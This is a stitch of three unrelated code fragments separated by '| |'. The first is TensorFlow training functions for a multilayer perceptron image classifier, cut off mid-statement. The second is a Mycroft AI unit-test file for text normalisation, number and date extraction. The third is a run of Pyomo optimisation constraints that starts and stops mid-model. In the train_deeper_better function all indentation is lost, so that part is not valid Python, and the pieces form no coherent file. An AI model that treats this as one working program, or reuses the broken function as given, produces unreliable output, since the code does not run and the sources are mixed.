    with tf.Session(graph=graph) as sess:
        tf.global_variables_initializer().run()
        for step in range(10001):
            # Walk through the training set in fixed-size minibatches,
            # wrapping around via the modulo on the offset.
            offset = (step * batch_size) % (train_labels.shape[0] - batch_size)
            batch_data = train_dataset[offset:(offset + batch_size), :]
            batch_labels = train_labels[offset:(offset + batch_size), :]
            feed_dict = {tf_train_dataset: batch_data, tf_train_labels: batch_labels}
            _, l, predictions = sess.run([optimizer, loss, train_prediction], feed_dict=feed_dict)
            if verbose and step % 500 == 0:
                logger.info('Batch loss at step %d is %f', step, l)
                logger.info('Batch accuracy: %.1f%%', calc_accuracy(predictions, batch_labels))
        test_accuracy = calc_accuracy(test_prediction.eval(), test_labels)
    return test_accuracy
def train_perceptron(
    train_dataset, train_labels, test_dataset, test_labels, reg_coeff
):
    """Basic MLP with one hidden layer and nonlinearity. Trying some regularization techniques.

    Trains a 1024-unit ReLU hidden layer with dropout (keep prob 0.5 during
    training, 1.0 at evaluation) and L2 weight decay for 5001 minibatch steps,
    then logs train/test accuracy.  Returns nothing; results are only logged.

    :param train_dataset: 2D array of flattened images, one sample per row
    :param train_labels: one-hot label matrix aligned with train_dataset
    :param test_dataset: held-out samples in the same layout
    :param test_labels: one-hot labels for test_dataset
    :param reg_coeff: L2 coefficient applied to both weight matrices
    """
    batch_size = 128
    num_samples = train_dataset.shape[0]
    graph = tf.Graph()
    with graph.as_default():
        # Graph-level seed: initializer draws are reproducible only if ops are
        # created in this exact order, so the construction order below matters.
        tf.set_random_seed(52)
        input_data = tf.placeholder(tf.float32, shape=(None, IMAGE_RES * IMAGE_RES))
        input_labels = tf.placeholder(tf.float32, shape=(None, NUM_CLASSES))
        dropout_keep_prob = tf.placeholder(tf.float32)
        w_1 = tf.Variable(tf.truncated_normal([IMAGE_RES * IMAGE_RES, 1024]))
        b_1 = tf.Variable(tf.zeros([1024]))
        layer_1 = tf.nn.relu(tf.matmul(input_data, w_1) + b_1)
        layer_1 = tf.nn.dropout(layer_1, dropout_keep_prob)
        w_2 = tf.Variable(tf.truncated_normal([1024, NUM_CLASSES]))
        b_2 = tf.Variable(tf.zeros(NUM_CLASSES))
        logits = tf.matmul(layer_1, w_2) + b_2
        unregularized_loss = tf.reduce_mean(
            tf.nn.softmax_cross_entropy_with_logits(labels=input_labels, logits=logits),
        )
        # Biases are intentionally excluded from the weight-decay term.
        l2_loss = reg_coeff * (l2(w_1) + l2(w_2))
        loss = unregularized_loss + l2_loss
        optimizer = tf.train.GradientDescentOptimizer(0.5).minimize(loss)
        prediction_op = tf.nn.softmax(logits)
    with tf.Session(graph=graph) as sess:
        tf.global_variables_initializer().run()
        logger.info('Initialized')
        for step in range(5001):
            # Cycle through the training set minibatch by minibatch.
            offset = (step * batch_size) % (num_samples - batch_size)
            batch_data = train_dataset[offset:(offset + batch_size), :]
            batch_labels = train_labels[offset:(offset + batch_size), :]
            feed_dict = {input_data: batch_data, input_labels: batch_labels, dropout_keep_prob: 0.5}
            _, l, predictions = sess.run([optimizer, loss, prediction_op], feed_dict=feed_dict)
            if step % 500 == 0:
                logger.info('Minibatch loss at step %d is %f', step, l)
                logger.info('Minibatch accuracy: %.1f%%', calc_accuracy(predictions, batch_labels))
        def evaluate(data, labels):
            """Calculate accuracy for dataset."""
            # Dropout disabled (keep prob 1.0) for evaluation.
            predictions = sess.run(
                prediction_op, feed_dict={input_data: data, dropout_keep_prob: 1.0}
            )
            return calc_accuracy(predictions, labels)
        train_acc = evaluate(train_dataset, train_labels)
        test_acc = evaluate(test_dataset, test_labels)
        logger.info('Train accuracy: %.1f%%', train_acc)
        logger.info('Test accuracy: %.1f%%', test_acc)
def train_better(
    train_dataset, train_labels, test_dataset, test_labels, reg_coeff=0.000005
):
    """
    Trying more regularization stuff and a different optimizer.
    This one is able to achieve 90.8% on unsanitized testing dataset with just one hidden layer.

    Same single-hidden-layer architecture as train_perceptron, but optimized
    with Adam (lr 1e-4) instead of SGD.  Nothing is returned; accuracy and
    loss are only logged.

    NOTE(review): the loop bound of 100,000,000 steps effectively means
    "train until interrupted"; the post-loop evaluation only runs if the
    loop completes -- confirm this is intentional.
    """
    batch_size = 128
    num_samples = train_dataset.shape[0]
    graph = tf.Graph()
    with graph.as_default():
        # Graph-level seed: reproducible initializers depend on op creation
        # order, so keep the construction sequence below unchanged.
        tf.set_random_seed(52)
        input_data = tf.placeholder(tf.float32, shape=(None, IMAGE_RES * IMAGE_RES))
        input_labels = tf.placeholder(tf.float32, shape=(None, NUM_CLASSES))
        dropout_keep_prob = tf.placeholder(tf.float32)
        w_1 = tf.Variable(tf.truncated_normal([IMAGE_RES * IMAGE_RES, 1024]))
        b_1 = tf.Variable(tf.zeros([1024]))
        layer_1 = tf.nn.relu(tf.matmul(input_data, w_1) + b_1)
        layer_1 = tf.nn.dropout(layer_1, dropout_keep_prob)
        w_2 = tf.Variable(tf.truncated_normal([1024, NUM_CLASSES]))
        b_2 = tf.Variable(tf.zeros(NUM_CLASSES))
        logits = tf.matmul(layer_1, w_2) + b_2
        prediction_op = tf.nn.softmax(logits)
        unregularized_loss = tf.reduce_mean(
            tf.nn.softmax_cross_entropy_with_logits(labels=input_labels, logits=logits),
        )
        l2_loss = reg_coeff * (l2(w_1) + l2(w_2))
        loss = unregularized_loss + l2_loss
        optimizer = tf.train.AdamOptimizer(learning_rate=(1e-4), epsilon=1e-3).minimize(loss)
    with tf.Session(graph=graph) as sess:
        tf.global_variables_initializer().run()
        logger.info('Initialized')
        for step in range(100000000):
            offset = (step * batch_size) % (num_samples - batch_size)
            batch_data = train_dataset[offset:(offset + batch_size), :]
            batch_labels = train_labels[offset:(offset + batch_size), :]
            feed_dict = {input_data: batch_data, input_labels: batch_labels, dropout_keep_prob: 0.5}
            sess.run(optimizer, feed_dict=feed_dict)
            if step % 1000 == 0:
                # Re-run the forward pass on the same minibatch to log the
                # loss breakdown (total / cross-entropy / L2).
                l, ureg_l, l2l, predictions = sess.run(
                    [loss, unregularized_loss, l2_loss, prediction_op],
                    feed_dict=feed_dict,
                )
                logger.info('Minibatch loss at step %d is %f %f %f', step, l, ureg_l, l2l)
                logger.info('Minibatch accuracy: %.1f%%', calc_accuracy(predictions, batch_labels))
        def evaluate(data, labels):
            """Calculate accuracy for dataset."""
            # Dropout disabled (keep prob 1) for evaluation.
            predictions, l = sess.run(
                [prediction_op, loss],
                feed_dict={input_data: data, input_labels: labels, dropout_keep_prob: 1}
            )
            return calc_accuracy(predictions, labels), l
        train_acc, train_loss = evaluate(train_dataset, train_labels)
        test_acc, test_loss = evaluate(test_dataset, test_labels)
        logger.info('Train accuracy: %.1f%% loss: %f', train_acc, train_loss)
        logger.info('Test accuracy: %.1f%% loss: %f', test_acc, test_loss)
def train_deeper(train_dataset, train_labels, test_dataset, test_labels):
    """
    Training perceptron with more hidden layers.
    This requires more regularization techniques, especially xavier weight initialization and
    batch normalization (as well as weight decay and dropout).

    Builds a 1024-300-50 stack of dense_regularized layers followed by a
    plain dense logits layer, trains with Adam, and logs accuracy/loss.
    Nothing is returned; results are only logged.

    NOTE(review): the loop bound of 100,000,000 steps effectively means
    "train until interrupted"; the final train/test evaluation only runs if
    the loop completes -- confirm this is intentional.
    """
    batch_size = 256
    num_samples = train_dataset.shape[0]
    graph = tf.Graph()
    with graph.as_default():
        # Graph-level seed; op creation order below determines the
        # initializer draws, so keep it unchanged.
        tf.set_random_seed(52)
        x = tf.placeholder(tf.float32, shape=(None, IMAGE_RES * IMAGE_RES), name='x')
        y = tf.placeholder(tf.float32, shape=(None, NUM_CLASSES), name='y')
        keep_prob = tf.placeholder(tf.float32)
        is_training = tf.placeholder(tf.bool, name='is_training')
        fc1 = dense_regularized(x, 1024, is_training, keep_prob, None, 'fc1')
        fc2 = dense_regularized(fc1, 300, is_training, keep_prob, None, 'fc2')
        fc3 = dense_regularized(fc2, 50, is_training, keep_prob, None, 'fc3')
        logits = dense(fc3, NUM_CLASSES, None, 'logits')
        with tf.name_scope('accuracy'):
            accuracy = tf.reduce_mean(
                tf.cast(tf.equal(tf.argmax(y, 1), tf.argmax(logits, 1)), tf.float32),
            )
        with tf.name_scope('loss'):
            loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=y))
        update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
        with tf.control_dependencies(update_ops):
            # Ensures that we execute the update_ops before performing the train_step
            train_step = tf.train.AdamOptimizer(learning_rate=1e-3, epsilon=1e-3).minimize(loss)
    with tf.Session(graph=graph) as sess:
        tf.global_variables_initializer().run()
        logger.info('Initialized')
        for step in range(100000000):
            offset = (step * batch_size) % (num_samples - batch_size)
            batch_data = train_dataset[offset:(offset + batch_size), :]
            batch_labels = train_labels[offset:(offset + batch_size), :]
            feed = {x: batch_data, y: batch_labels, keep_prob: 0.5, is_training: True}
            sess.run(train_step, feed_dict=feed)
            if step % 1000 == 0:
                # NOTE(review): this "test" feed keeps keep_prob at 0.5 while
                # is_training is False, i.e. dropout is still active during
                # this periodic evaluation -- likely unintended; confirm.
                test_feed = {x: batch_data, y: batch_labels, keep_prob: 0.5, is_training: False}
                ac, l = sess.run([accuracy, loss], feed_dict=test_feed)
                logger.info('Minibatch loss at step %d is %f', step, l)
                logger.info('Minibatch accuracy: %.2f%%', ac * 100)
                sample_logits = sess.run(
                    logits, feed_dict={x: batch_data[:1], keep_prob: 1, is_training: False},
                )
                logger.info(
                    'Sample logits: %r mean: %f',
                    sample_logits, np.mean(np.absolute(sample_logits)),
                )
        # Final evaluation with dropout disabled (keep_prob 1).
        train_ac, train_l = sess.run(
            [accuracy, loss],
            feed_dict={x: train_dataset, y: train_labels, keep_prob: 1, is_training: False},
        )
        test_ac, test_l = sess.run(
            [accuracy, loss],
            feed_dict={x: test_dataset, y: test_labels, keep_prob: 1, is_training: False},
        )
        logger.info('Train accuracy: %.2f%% loss: %f', train_ac * 100, train_l)
        logger.info('Test accuracy: %.2f%% loss: %f', test_ac * 100, test_l)
def train_deeper_better(train_data, train_labels, test_data, test_labels, params):
"""Same as 'train_deeper', but now with tf.contrib.data.Dataset input pipeline."""
default_params = {
'regularization_coeff': 0.00001,
'keep_prob': 0.5,
'batch_size': 128,
'fc1_size': 2048,
'fc2_size': 1024,
'fc3_size': 1024,
'fc4_size': 1024,
'fc5_size': 512,
'activation': 'relu',
}
activation_funcs = {
'relu': tf.nn.relu,
'tanh': tf.nn.tanh,
}
def get_param(name):
if name in params:
return params[name]
logger.warning('%s not found in param, use default value %r', name, default_params[name])
return default_params[name]
regularization_coeff = get_param('regularization_coeff')
keep_prob_param = get_param('keep_prob')
batch_size = int(get_param('batch_size'))
fc1_size = int(get_param('fc1_size'))
fc2_size = int(get_param('fc2_size'))
fc3_size = int(get_param('fc3_size'))
fc4_size = int(get_param('fc4_size'))
fc5_size = int(get_param('fc5_size'))
activation_func = activation_funcs[get_param('activation')]
save_restore = False
time_limit_seconds = 3600
saver_path = join(SAVER_FOLDER, train_deeper_better.__name__)
graph = tf.Graph()
with graph.as_default():
tf.set_random_seed(52)
global_step_tensor = tf.contrib.framework.get_or_create_global_step()
epoch_tensor = tf.Variable(0, trainable=False, name='epoch')
next_epoch = tf.assign_add(epoch_tensor, 1)
# dataset definition
dataset = Dataset.from_tensor_slices({'x': train_data, 'y': train_labels})
dataset = dataset.shuffle(buffer_size=10000)
dataset = dataset.batch(batch_size)
iterator = dataset.make_initializable_iterator()
sample = iterator.get_next()
x = sample['x']
y = sample['y']
# actual computation graph
keep_prob = tf.placeholder(tf.float32)
is_training = tf.placeholder(tf.bool, name='is_training')
regularizer = tf.contrib.layers.l2_regularizer(scale=regularization_coeff)
def fully_connected(x, size, name):
return dense_regularized(
x, size, is_training, keep_prob, regularizer, name, activation_func,
)
fc1 = fully_connected(x, fc1_size, 'fc1')
fc2 = fully_connected(fc1, fc2_size, 'fc2')
fc3 = fully_connected(fc2, fc3_size, 'fc3')
fc4 = fully_connected(fc3, fc4_size, 'fc4')
fc5 = fully_connected(fc4, fc5_size, 'fc5')
logits = dense(fc5, NUM_CLASSES, regularizer, 'logits')
layer_summaries(logits, 'logits_summaries')
with tf.name_scope('accuracy'):
accuracy = tf.reduce_mean(
tf.cast(tf.equal(tf.argmax(y, 1), tf.argmax(logits, 1)), tf.float32),
)
accuracy_percent = 100 * accuracy
tf.summary.scalar('accuracy_percent', accuracy_percent)
with tf.name_scope('loss'):
regularization_losses = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)
regularization_loss = tf.reduce_sum(regularization_losses)
cross_entropy_loss = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=y),
)
loss = cross_entropy_loss + regularization_loss
tf.summary.scalar('regularization_loss', regularization_loss)
tf.summary.scalar('cross_entropy_loss', cross_entropy_loss)
tf.summary.scalar('loss', loss)
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
# ensures that we execute the update_ops before performing the train_op
# needed for batch normalization (apparently)
optimizer = tf.train.AdamOptimizer(learning_rate=(1e-4), epsilon=1e-3)
train_op = optimizer.minimize(loss, global_step=global_step_tensor)
all_summaries = tf.summary.merge_all()
train_writer = tf.summary.FileWriter(join(SUMMARY_FOLDER, 'train'))
batch_writer = tf.summary.FileWriter(join(SUMMARY_FOLDER, 'batch'))
test_writer = tf.summary.FileWriter(join(SUMMARY_FOLDER, 'test'))
saver = tf.train.Saver(max_to_keep=3)
test_accuracy = 0
best_accuracy = 0
with tf.Session(graph=graph) as sess:
restored = False
if save_restore:
try:
saver.restore(sess, tf.train.latest_checkpoint(checkpoint_dir=SAVER_FOLDER))
restored = True
except ValueError as exc:
logger.info('Could not restore | |
# Mycroft AI parse-utility tests
# -*- coding: iso-8859-15 -*-
#
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
from datetime import datetime
from mycroft.util.parse import get_gender
from mycroft.util.parse import extract_datetime
from mycroft.util.parse import extractnumber
from mycroft.util.parse import normalize
class TestNormalize(unittest.TestCase):
    """Tests for mycroft.util.parse normalization and extraction helpers."""

    def test_articles(self):
        """normalize() drops articles only when remove_articles=True."""
        self.assertEqual(normalize("this is a test", remove_articles=True),
                         "this is test")
        self.assertEqual(normalize("this is the test", remove_articles=True),
                         "this is test")
        self.assertEqual(normalize("and another test", remove_articles=True),
                         "and another test")
        self.assertEqual(normalize("this is an extra test",
                                   remove_articles=False),
                         "this is an extra test")

    def test_extractnumber(self):
        """extractnumber() pulls the first numeric value out of English text."""
        self.assertEqual(extractnumber("this is the first test"), 1)
        self.assertEqual(extractnumber("this is 2 test"), 2)
        self.assertEqual(extractnumber("this is second test"), 2)
        self.assertEqual(extractnumber("this is the third test"), 1.0 / 3.0)
        self.assertEqual(extractnumber("this is test number 4"), 4)
        self.assertEqual(extractnumber("one third of a cup"), 1.0 / 3.0)
        self.assertEqual(extractnumber("three cups"), 3)
        self.assertEqual(extractnumber("1/3 cups"), 1.0 / 3.0)
        self.assertEqual(extractnumber("quarter cup"), 0.25)
        self.assertEqual(extractnumber("1/4 cup"), 0.25)
        self.assertEqual(extractnumber("one fourth cup"), 0.25)
        self.assertEqual(extractnumber("2/3 cups"), 2.0 / 3.0)
        self.assertEqual(extractnumber("3/4 cups"), 3.0 / 4.0)
        self.assertEqual(extractnumber("1 and 3/4 cups"), 1.75)
        self.assertEqual(extractnumber("1 cup and a half"), 1.5)
        self.assertEqual(extractnumber("one cup and a half"), 1.5)
        self.assertEqual(extractnumber("one and a half cups"), 1.5)
        self.assertEqual(extractnumber("one and one half cups"), 1.5)
        self.assertEqual(extractnumber("three quarter cups"), 3.0 / 4.0)
        self.assertEqual(extractnumber("three quarters cups"), 3.0 / 4.0)

    def test_extractdatetime_en(self):
        """extract_datetime() relative to a fixed anchor (Tue 2017-06-27)."""
        def extractWithFormat(text):
            # Fixed anchor date.  Written without leading-zero integer
            # literals (06, 00), which are a SyntaxError in Python 3.
            date = datetime(2017, 6, 27, 0, 0)
            [extractedDate, leftover] = extract_datetime(text, date)
            extractedDate = extractedDate.strftime("%Y-%m-%d %H:%M:%S")
            return [extractedDate, leftover]

        def testExtract(text, expected_date, expected_leftover):
            res = extractWithFormat(text)
            self.assertEqual(res[0], expected_date)
            self.assertEqual(res[1], expected_leftover)

        testExtract("Set the ambush for 5 days from today",
                    "2017-07-02 00:00:00", "set ambush")
        testExtract("What is the day after tomorrow's weather?",
                    "2017-06-29 00:00:00", "what is weather")
        testExtract("Remind me at 10:45 pm",
                    "2017-06-27 22:45:00", "remind me")
        testExtract("what is the weather on friday morning",
                    "2017-06-30 08:00:00", "what is weather")
        testExtract("what is tomorrow's weather",
                    "2017-06-28 00:00:00", "what is weather")
        testExtract("remind me to call mom in 8 weeks and 2 days",
                    "2017-08-24 00:00:00", "remind me to call mom")
        testExtract("Play Rick Astley music 2 days from Friday",
                    "2017-07-02 00:00:00", "play rick astley music")
        testExtract("Begin the invasion at 3:45 pm on Thursday",
                    "2017-06-29 15:45:00", "begin invasion")
        testExtract("On Monday, order pie from the bakery",
                    "2017-07-03 00:00:00", "order pie from bakery")
        testExtract("Play Happy Birthday music 5 years from today",
                    "2022-06-27 00:00:00", "play happy birthday music")
        testExtract("Skype Mom at 12:45 pm next Thursday",
                    "2017-07-06 12:45:00", "skype mom")
        testExtract("What's the weather next Thursday?",
                    "2017-07-06 00:00:00", "what weather")
        testExtract("what is the weather next friday morning",
                    "2017-07-07 08:00:00", "what is weather")
        testExtract("what is the weather next friday evening",
                    "2017-07-07 19:00:00", "what is weather")
        testExtract("what is the weather next friday afternoon",
                    "2017-07-07 15:00:00", "what is weather")
        testExtract("remind me to call mom on august 3rd",
                    "2017-08-03 00:00:00", "remind me to call mom")
        testExtract("Buy fireworks on the 4th of July",
                    "2017-07-04 00:00:00", "buy fireworks")
        testExtract("what is the weather 2 weeks from next friday",
                    "2017-07-21 00:00:00", "what is weather")
        testExtract("what is the weather wednesday at 0700 hours",
                    "2017-06-28 07:00:00", "what is weather")
        testExtract("what is the weather wednesday at 7 o'clock",
                    "2017-06-28 07:00:00", "what is weather")
        testExtract("Set up an appointment at 12:45 pm next Thursday",
                    "2017-07-06 12:45:00", "set up appointment")
        testExtract("What's the weather this Thursday?",
                    "2017-06-29 00:00:00", "what weather")
        testExtract("set up the visit for 2 weeks and 6 days from Saturday",
                    "2017-07-21 00:00:00", "set up visit")
        testExtract("Begin the invasion at 03 45 on Thursday",
                    "2017-06-29 03:45:00", "begin invasion")
        testExtract("Begin the invasion at o 800 hours on Thursday",
                    "2017-06-29 08:00:00", "begin invasion")
        testExtract("Begin the party at 8 o'clock in the evening on Thursday",
                    "2017-06-29 20:00:00", "begin party")
        testExtract("Begin the invasion at 8 in the evening on Thursday",
                    "2017-06-29 20:00:00", "begin invasion")
        testExtract("Begin the invasion on Thursday at noon",
                    "2017-06-29 12:00:00", "begin invasion")
        testExtract("Begin the invasion on Thursday at midnight",
                    "2017-06-29 00:00:00", "begin invasion")
        testExtract("Begin the invasion on Thursday at 0500",
                    "2017-06-29 05:00:00", "begin invasion")
        testExtract("remind me to wake up in 4 years",
                    "2021-06-27 00:00:00", "remind me to wake up")
        testExtract("remind me to wake up in 4 years and 4 days",
                    "2021-07-01 00:00:00", "remind me to wake up")
        testExtract("What is the weather 3 days after tomorrow?",
                    "2017-07-01 00:00:00", "what is weather")

    def test_spaces(self):
        """normalize() collapses leading/trailing whitespace."""
        self.assertEqual(normalize("  this is a test"),
                         "this is test")
        self.assertEqual(normalize("  this is a test  "),
                         "this is test")
        self.assertEqual(normalize("  this is one test"),
                         "this is 1 test")

    def test_numbers(self):
        """normalize() converts spelled-out numbers to digits."""
        self.assertEqual(normalize("this is a one two three  test"),
                         "this is 1 2 3 test")
        self.assertEqual(normalize("  it's a four five six  test"),
                         "it is 4 5 6 test")
        self.assertEqual(normalize("it's  a seven eight nine test"),
                         "it is 7 8 9 test")
        self.assertEqual(normalize("it's a seven eight nine  test"),
                         "it is 7 8 9 test")
        self.assertEqual(normalize("that's a ten eleven twelve test"),
                         "that is 10 11 12 test")
        self.assertEqual(normalize("that's a thirteen fourteen test"),
                         "that is 13 14 test")
        self.assertEqual(normalize("that's fifteen sixteen seventeen"),
                         "that is 15 16 17")
        self.assertEqual(normalize("that's eighteen nineteen twenty"),
                         "that is 18 19 20")

    def test_contractions(self):
        """normalize() expands English contractions."""
        self.assertEqual(normalize("ain't"), "is not")
        self.assertEqual(normalize("aren't"), "are not")
        self.assertEqual(normalize("can't"), "can not")
        self.assertEqual(normalize("could've"), "could have")
        self.assertEqual(normalize("couldn't"), "could not")
        self.assertEqual(normalize("didn't"), "did not")
        self.assertEqual(normalize("doesn't"), "does not")
        self.assertEqual(normalize("don't"), "do not")
        self.assertEqual(normalize("gonna"), "going to")
        self.assertEqual(normalize("gotta"), "got to")
        self.assertEqual(normalize("hadn't"), "had not")
        self.assertEqual(normalize("hadn't have"), "had not have")
        self.assertEqual(normalize("hasn't"), "has not")
        self.assertEqual(normalize("haven't"), "have not")
        # TODO: Ambiguous with "he had"
        self.assertEqual(normalize("he'd"), "he would")
        self.assertEqual(normalize("he'll"), "he will")
        # TODO: Ambiguous with "he has"
        self.assertEqual(normalize("he's"), "he is")
        # TODO: Ambiguous with "how would"
        self.assertEqual(normalize("how'd"), "how did")
        self.assertEqual(normalize("how'll"), "how will")
        # TODO: Ambiguous with "how has" and "how does"
        self.assertEqual(normalize("how's"), "how is")
        # TODO: Ambiguous with "I had"
        self.assertEqual(normalize("I'd"), "I would")
        self.assertEqual(normalize("I'll"), "I will")
        self.assertEqual(normalize("I'm"), "I am")
        self.assertEqual(normalize("I've"), "I have")
        self.assertEqual(normalize("I haven't"), "I have not")
        self.assertEqual(normalize("isn't"), "is not")
        self.assertEqual(normalize("it'd"), "it would")
        self.assertEqual(normalize("it'll"), "it will")
        # TODO: Ambiguous with "it has"
        self.assertEqual(normalize("it's"), "it is")
        self.assertEqual(normalize("it isn't"), "it is not")
        self.assertEqual(normalize("mightn't"), "might not")
        self.assertEqual(normalize("might've"), "might have")
        self.assertEqual(normalize("mustn't"), "must not")
        self.assertEqual(normalize("mustn't have"), "must not have")
        self.assertEqual(normalize("must've"), "must have")
        self.assertEqual(normalize("needn't"), "need not")
        self.assertEqual(normalize("oughtn't"), "ought not")
        self.assertEqual(normalize("shan't"), "shall not")
        # TODO: Ambiguous with "she had"
        self.assertEqual(normalize("she'd"), "she would")
        self.assertEqual(normalize("she hadn't"), "she had not")
        self.assertEqual(normalize("she'll"), "she will")
        self.assertEqual(normalize("she's"), "she is")
        self.assertEqual(normalize("she isn't"), "she is not")
        self.assertEqual(normalize("should've"), "should have")
        self.assertEqual(normalize("shouldn't"), "should not")
        self.assertEqual(normalize("shouldn't have"), "should not have")
        self.assertEqual(normalize("somebody's"), "somebody is")
        # TODO: Ambiguous with "someone had"
        self.assertEqual(normalize("someone'd"), "someone would")
        self.assertEqual(normalize("someone hadn't"), "someone had not")
        self.assertEqual(normalize("someone'll"), "someone will")
        # TODO: Ambiguous with "someone has"
        self.assertEqual(normalize("someone's"), "someone is")
        self.assertEqual(normalize("that'll"), "that will")
        # TODO: Ambiguous with "that has"
        self.assertEqual(normalize("that's"), "that is")
        # TODO: Ambiguous with "that had"
        self.assertEqual(normalize("that'd"), "that would")
        # TODO: Ambiguous with "there had"
        self.assertEqual(normalize("there'd"), "there would")
        self.assertEqual(normalize("there're"), "there are")
        # TODO: Ambiguous with "there has"
        self.assertEqual(normalize("there's"), "there is")
        # TODO: Ambiguous with "they had"
        self.assertEqual(normalize("they'd"), "they would")
        self.assertEqual(normalize("they'll"), "they will")
        self.assertEqual(normalize("they won't have"), "they will not have")
        self.assertEqual(normalize("they're"), "they are")
        self.assertEqual(normalize("they've"), "they have")
        self.assertEqual(normalize("they haven't"), "they have not")
        self.assertEqual(normalize("wasn't"), "was not")
        # TODO: Ambiguous with "we had"
        self.assertEqual(normalize("we'd"), "we would")
        self.assertEqual(normalize("we would've"), "we would have")
        self.assertEqual(normalize("we wouldn't"), "we would not")
        self.assertEqual(normalize("we wouldn't have"), "we would not have")
        self.assertEqual(normalize("we'll"), "we will")
        self.assertEqual(normalize("we won't have"), "we will not have")
        self.assertEqual(normalize("we're"), "we are")
        self.assertEqual(normalize("we've"), "we have")
        self.assertEqual(normalize("weren't"), "were not")
        self.assertEqual(normalize("what'd"), "what did")
        self.assertEqual(normalize("what'll"), "what will")
        self.assertEqual(normalize("what're"), "what are")
        # TODO: Ambiguous with "what has" / "what does")
        self.assertEqual(normalize("whats"), "what is")
        self.assertEqual(normalize("what's"), "what is")
        self.assertEqual(normalize("what've"), "what have")
        # TODO: Ambiguous with "when has"
        self.assertEqual(normalize("when's"), "when is")
        self.assertEqual(normalize("where'd"), "where did")
        # TODO: Ambiguous with "where has" / where does"
        self.assertEqual(normalize("where's"), "where is")
        self.assertEqual(normalize("where've"), "where have")
        # TODO: Ambiguous with "who had" "who did")
        self.assertEqual(normalize("who'd"), "who would")
        self.assertEqual(normalize("who'd've"), "who would have")
        self.assertEqual(normalize("who'll"), "who will")
        self.assertEqual(normalize("who're"), "who are")
        # TODO: Ambiguous with "who has" / "who does"
        self.assertEqual(normalize("who's"), "who is")
        self.assertEqual(normalize("who've"), "who have")
        self.assertEqual(normalize("why'd"), "why did")
        self.assertEqual(normalize("why're"), "why are")
        # TODO: Ambiguous with "why has" / "why does"
        self.assertEqual(normalize("why's"), "why is")
| |
= Constraint(expr= m.x965 == 0)
m.c1442 = Constraint(expr= m.x980 == 0)
m.c1443 = Constraint(expr= m.x981 == 0)
m.c1444 = Constraint(expr= m.x720 - m.x962 - m.x964 == 0)
m.c1445 = Constraint(expr= m.x721 - m.x963 - m.x965 == 0)
m.c1446 = Constraint(expr= m.x730 - m.x978 - m.x980 == 0)
m.c1447 = Constraint(expr= m.x731 - m.x979 - m.x981 == 0)
m.c1448 = Constraint(expr= m.x962 - 0.705049913072943*m.b1046 <= 0)
m.c1449 = Constraint(expr= m.x963 - 0.705049913072943*m.b1047 <= 0)
m.c1450 = Constraint(expr= m.x964 + 0.705049913072943*m.b1046 <= 0.705049913072943)
m.c1451 = Constraint(expr= m.x965 + 0.705049913072943*m.b1047 <= 0.705049913072943)
m.c1452 = Constraint(expr= m.x978 - 0.480234946352917*m.b1046 <= 0)
m.c1453 = Constraint(expr= m.x979 - 0.480234946352917*m.b1047 <= 0)
m.c1454 = Constraint(expr= m.x980 + 0.480234946352917*m.b1046 <= 0.480234946352917)
m.c1455 = Constraint(expr= m.x981 + 0.480234946352917*m.b1047 <= 0.480234946352917)
m.c1456 = Constraint(expr=(m.x982/(1e-6 + m.b1048) - log(1 + m.x948/(1e-6 + m.b1048)))*(1e-6 + m.b1048) <= 0)
m.c1457 = Constraint(expr=(m.x983/(1e-6 + m.b1049) - log(1 + m.x949/(1e-6 + m.b1049)))*(1e-6 + m.b1049) <= 0)
m.c1458 = Constraint(expr= m.x952 == 0)
m.c1459 = Constraint(expr= m.x953 == 0)
m.c1460 = Constraint(expr= m.x984 == 0)
m.c1461 = Constraint(expr= m.x985 == 0)
m.c1462 = Constraint(expr= m.x714 - m.x948 - m.x952 == 0)
m.c1463 = Constraint(expr= m.x715 - m.x949 - m.x953 == 0)
m.c1464 = Constraint(expr= m.x732 - m.x982 - m.x984 == 0)
m.c1465 = Constraint(expr= m.x733 - m.x983 - m.x985 == 0)
m.c1466 = Constraint(expr= m.x948 - 0.994083415506506*m.b1048 <= 0)
m.c1467 = Constraint(expr= m.x949 - 0.994083415506506*m.b1049 <= 0)
m.c1468 = Constraint(expr= m.x952 + 0.994083415506506*m.b1048 <= 0.994083415506506)
m.c1469 = Constraint(expr= m.x953 + 0.994083415506506*m.b1049 <= 0.994083415506506)
m.c1470 = Constraint(expr= m.x982 - 0.690184503917672*m.b1048 <= 0)
m.c1471 = Constraint(expr= m.x983 - 0.690184503917672*m.b1049 <= 0)
m.c1472 = Constraint(expr= m.x984 + 0.690184503917672*m.b1048 <= 0.690184503917672)
m.c1473 = Constraint(expr= m.x985 + 0.690184503917672*m.b1049 <= 0.690184503917672)
m.c1474 = Constraint(expr= - 0.9*m.x966 + m.x986 == 0)
m.c1475 = Constraint(expr= - 0.9*m.x967 + m.x987 == 0)
m.c1476 = Constraint(expr= m.x968 == 0)
m.c1477 = Constraint(expr= m.x969 == 0)
m.c1478 = Constraint(expr= m.x988 == 0)
m.c1479 = Constraint(expr= m.x989 == 0)
m.c1480 = Constraint(expr= m.x722 - m.x966 - m.x968 == 0)
m.c1481 = Constraint(expr= m.x723 - m.x967 - m.x969 == 0)
m.c1482 = Constraint(expr= m.x734 - m.x986 - m.x988 == 0)
m.c1483 = Constraint(expr= m.x735 - m.x987 - m.x989 == 0)
m.c1484 = Constraint(expr= m.x966 - 15*m.b1050 <= 0)
m.c1485 = Constraint(expr= m.x967 - 15*m.b1051 <= 0)
m.c1486 = Constraint(expr= m.x968 + 15*m.b1050 <= 15)
m.c1487 = Constraint(expr= m.x969 + 15*m.b1051 <= 15)
m.c1488 = Constraint(expr= m.x986 - 13.5*m.b1050 <= 0)
m.c1489 = Constraint(expr= m.x987 - 13.5*m.b1051 <= 0)
m.c1490 = Constraint(expr= m.x988 + 13.5*m.b1050 <= 13.5)
